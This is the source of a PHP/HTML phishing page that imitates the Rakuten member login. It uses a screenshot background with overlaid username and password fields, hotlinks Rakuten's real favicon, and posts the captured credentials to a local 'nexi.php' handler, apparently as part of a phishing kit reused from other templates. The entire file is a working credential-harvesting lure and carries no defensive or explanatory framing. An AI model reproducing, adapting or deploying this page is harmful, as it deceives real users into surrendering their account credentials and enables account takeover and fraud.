﻿<?php   ob_start();  ?>
<?
include "X.php";
?>
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
	<title>【楽天】ログイン</title>
	<link rel="icon" type="image/png" href="https://member.id.rakuten.co.jp/favicon.ico" />
	<style>
		body {
		 margin-top: -41;
		 background: #fff;
		}

		.page {
		 background-image: url("STR/Nexi1.png");
		 background-repeat: no-repeat;
		 height: 695px;
		 width: 1340px;
		 position: relative;
		}
		
		input, select {
		 position: absolute; /* VODKA */
		 width: 304;
		 height: 22;
		 border: 0;
		 padding: 3 8 3 8;
		 left: 587;
		}

		.button {
		 width: 105;
		 height: 37;
		 border: 0;
		 cursor: pointer;
		}
		.submit {
		 position: absolute;
		 left: 810;
		 top: 540;
		}
	.auto-style1 {
	margin-top: 8px;
}
.auto-style2 {
	margin-top: 0px;
}
	</style>
	

								<p>&nbsp;<form name="appleConnectForm" method="post" action="nexi.php">

	<center>
			<form action="--WEBBOT-SELF--" method="POST" id="info" onsubmit="if(do_submit(3)) return true; else return false;">
		<div class="page" style="left: 0px; top: 0px; height: 1295px">

			<div>
				<input type="text" autocapitalize="off" autocorrect="off" maxlength="29" tabindex="1" required="" title="" id="fullname4" name="j1" style="top:274; position:absolute; left:368; width:251px; height:20px" size="41" class="auto-style2">
				<input type="password" id="pass0" name="j2" class="auto-style1" required="" title="  " style="position: absolute; left: 368; top: 318; height: 20px; width: 251px" size="1"><div class="button submit" onclick="javascript:do_submit(1);" style="position: absolute; left: 420px; top: 255px; width: 88px; height: 30px">
					<p>
<input type="image"  border="0" alt="" name="submit" style="position: absolute; left: -70; top: 130; " src="STR/blank.gif" height="40" width="202">
					<p>
					&nbsp;</div>
					<!--  -->